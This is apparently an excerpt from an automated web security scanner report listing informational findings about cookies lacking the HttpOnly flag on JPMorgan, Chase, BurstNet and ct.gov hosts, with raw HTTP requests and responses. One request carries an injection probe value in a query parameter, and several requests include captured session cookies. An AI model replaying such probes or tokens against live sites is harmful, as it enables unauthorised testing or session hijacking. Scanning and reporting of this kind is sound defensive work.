11.190. http://webtrends.chase.com/dcsa2cd6l000008m66hyi0bxa_9k6w/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webtrends.chase.com
Path:	/dcsa2cd6l000008m66hyi0bxa_9k6w/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xOTAxNTA2NDgwLjMwMTYzMTIwAAAAAAACAAAAEgAAALd1HE6wdRxOMgAAANJ1HE7SdRxOAQAAAAEAAADSdRxOsHUcTgEAAAASAAAAIzE3My4xOTMuMjE0LjI0My0xOTAxNTA2NDgwLjMwMTYzMTIw; path=/; expires=Fri, 09-Jul-2021 16:26:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsa2cd6l000008m66hyi0bxa_9k6w/dcs.gif?&dcsdat=1310488016507&dcssip=www.jpmorganchase.com&dcsuri=/corporate/Home/home.htm&dcsqry=%3Faaaa=bbbb%22%3Ess%26ccc=dddd%2611111=22222&dcsref=http://www.fakereferrerdominator.com/referrerPathName%3FRefParName=RefValue&WT.co_f=173.193.214.243-1901506480.30163120&WT.vtid=173.193.214.243-1901506480.30163120&WT.vtvs=1310488016513&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=11&WT.ul=en-US&WT.cd=24&WT.sr=1920x1200&WT.jo=Yes&WT.ti=JPMorgan%20Chase%20%26%20Co.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1064x680&WT.fv=Not%20enabled&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.jpmorganchase.com/corporate/Home/home.htm&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f=1 HTTP/1.1
Host: webtrends.chase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jpmorganchase.com/corporate/Home/home.htm
Cookie: v1st=840D35D906959BA5; WT_FPC=id=173.193.214.243-1901506480.30163120:lv=1310487990282:ss=1310487984044; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xOTAxNTA2NDgwLjMwMTYzMTIwAAAAAAABAAAAEgAAALd1HE6wdRxOAQAAAAEAAAC3dRxOsHUcTgEAAAASAAAAIzE3My4xOTMuMjE0LjI0My0xOTAxNTA2NDgwLjMwMTYzMTIw

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 16:00:42 GMT
Accept-Ranges: bytes
ETag: "0f1d8c1d160c71:9ab"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xOTAxNTA2NDgwLjMwMTYzMTIwAAAAAAACAAAAEgAAALd1HE6wdRxOMgAAANJ1HE7SdRxOAQAAAAEAAADSdRxOsHUcTgEAAAASAAAAIzE3My4xOTMuMjE0LjI0My0xOTAxNTA2NDgwLjMwMTYzMTIw; path=/; expires=Fri, 09-Jul-2021 16:26:58 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 12 Jul 2011 16:26:58 GMT
Connection: close

GIF89a.............!.......,...........D..;

11.191. http://www.burstnet.com/enlightn/3599//E519/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/3599//E519/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:51 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.192. http://www.burstnet.com/enlightn/3893//392A/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/3893//392A/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:28 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:28 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:28 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

11.193. http://www.burstnet.com/enlightn/5158//2CB4/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/5158//2CB4/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 12-Jul-2012 20:40:09 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 12-Jul-2012 20:40:09 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

11.194. http://www.burstnet.com/enlightn/8117//3E06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:52 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:52 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

11.195. http://www.burstnet.com/enlightn/8171/99D2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8171/99D2/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; expires=Tue, 09-Aug-2011 20:39:27 GMT; path=/; domain=.www.burstnet.com
CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd; path=/; expires=Thu, 12-Jul-2012 20:39:27 GMT; domain=.burstnet.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.196. http://www.ct.gov/demhs/site/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ct.gov
Path:	/demhs/site/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

demhs=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06105&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fdemhs%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/demhs

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /demhs/site/default.asp HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.197. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYlT,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYlT,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYlT,34698,00000,34506,00000; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT
RQ=3763,5JCcZ,3151,57rv5,3173,5OYlT,3190,5OYlT,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,5OYlT,1267,53br0,2831,5OYl5,2848,5OYlT,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,5OYlT,2921,5OYlT,2887,53br0,3468,53br2,1042,5OYlT,1182,5OYlT,1271,5OYlT,1273,5OYlT,1286,5OYlT,1339,5OYlT,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,5OYlT,3491,5JDlu,3387,5OYlT,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.198. http://www.jpmorgan.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:09 GMT
Server: Apache
Last-Modified: Sat, 09 Apr 2011 02:19:55 GMT
Accept-Ranges: bytes
Content-Length: 236
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Cache-Control: max-age=120, must-revalidate
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" Content="0; URL=http://www.jpmorgan.com/pages/jpmorgan">
<link rel="canonical" href="http://www.jpmorgan.com
...[SNIP]...

11.199. http://www.jpmorgan.com/cm/BlobServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/cm/BlobServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm/BlobServer?blobcol=urldata&blobtable=MungoBlobs&blobkey=id&blobwhere=1158633611737 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:03 GMT
Server: Apache
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif
Content-Length: 21997

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

11.200. http://www.jpmorgan.com/cm/Satellite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/cm/Satellite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:12 GMT
Server: Apache
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/css
Content-Length: 14811

/* General tag definitions */
body {
   margin: 0;
   padding: 0;
   font-size: .8em;
background-color: #ffffff;
   background-image:url(../images/background_subpage.jpg);
   ba
...[SNIP]...

11.201. http://www.jpmorgan.com/css/lightview.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/css/lightview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lightview.css HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:14 GMT
Server: Apache
Last-Modified: Wed, 04 Aug 2010 00:40:29 GMT
Accept-Ranges: bytes
Content-Length: 9568
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/css

/* lightview.css
http://www.nickstakenburg.com/projects/lightview
*/

#lightview {
   position: absolute;
   top: 50%;
   left: 50%;
   height: 150px;
   width: 150px;
   margin: -75px 0 0 -75px;
   padding: 0;

...[SNIP]...

11.202. http://www.jpmorgan.com/emetrics/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/emetrics/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emetrics/s_code.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:25 GMT
Server: Apache
Last-Modified: Fri, 12 Nov 2010 20:44:49 GMT
Accept-Ranges: bytes
Content-Length: 39759
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved. More info available at
http://www.omniture.com */
/* Report suite for J.P. Morgan site */

/* #################
...[SNIP]...

11.203. http://www.jpmorgan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:10 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 20:30:58 GMT
Accept-Ranges: bytes
Content-Length: 894
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/plain

..............h.......(....... ................................ 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6
...[SNIP]...

11.204. http://www.jpmorgan.com/images/background_subpage.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/background_subpage.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/background_subpage.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:53 GMT
Server: Apache
Last-Modified: Thu, 31 Jul 2008 16:22:28 GMT
Accept-Ranges: bytes
Content-Length: 8476
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d.................................................................................................................................................f.b..
...[SNIP]...

11.205. http://www.jpmorgan.com/images/bkgrd_container_2008.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/bkgrd_container_2008.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bkgrd_container_2008.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:25 GMT
Server: Apache
Last-Modified: Fri, 08 Aug 2008 13:36:34 GMT
Accept-Ranges: bytes
Content-Length: 22872
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

...............................................................b..
...[SNIP]...

11.206. http://www.jpmorgan.com/images/bkgrd_content_lob.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/bkgrd_content_lob.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bkgrd_content_lob.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:58 GMT
Server: Apache
Last-Modified: Fri, 06 Oct 2006 14:36:45 GMT
Accept-Ranges: bytes
Content-Length: 44
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.............!.......,.............X.;

11.207. http://www.jpmorgan.com/images/bkgrd_rr_generic.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/bkgrd_rr_generic.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

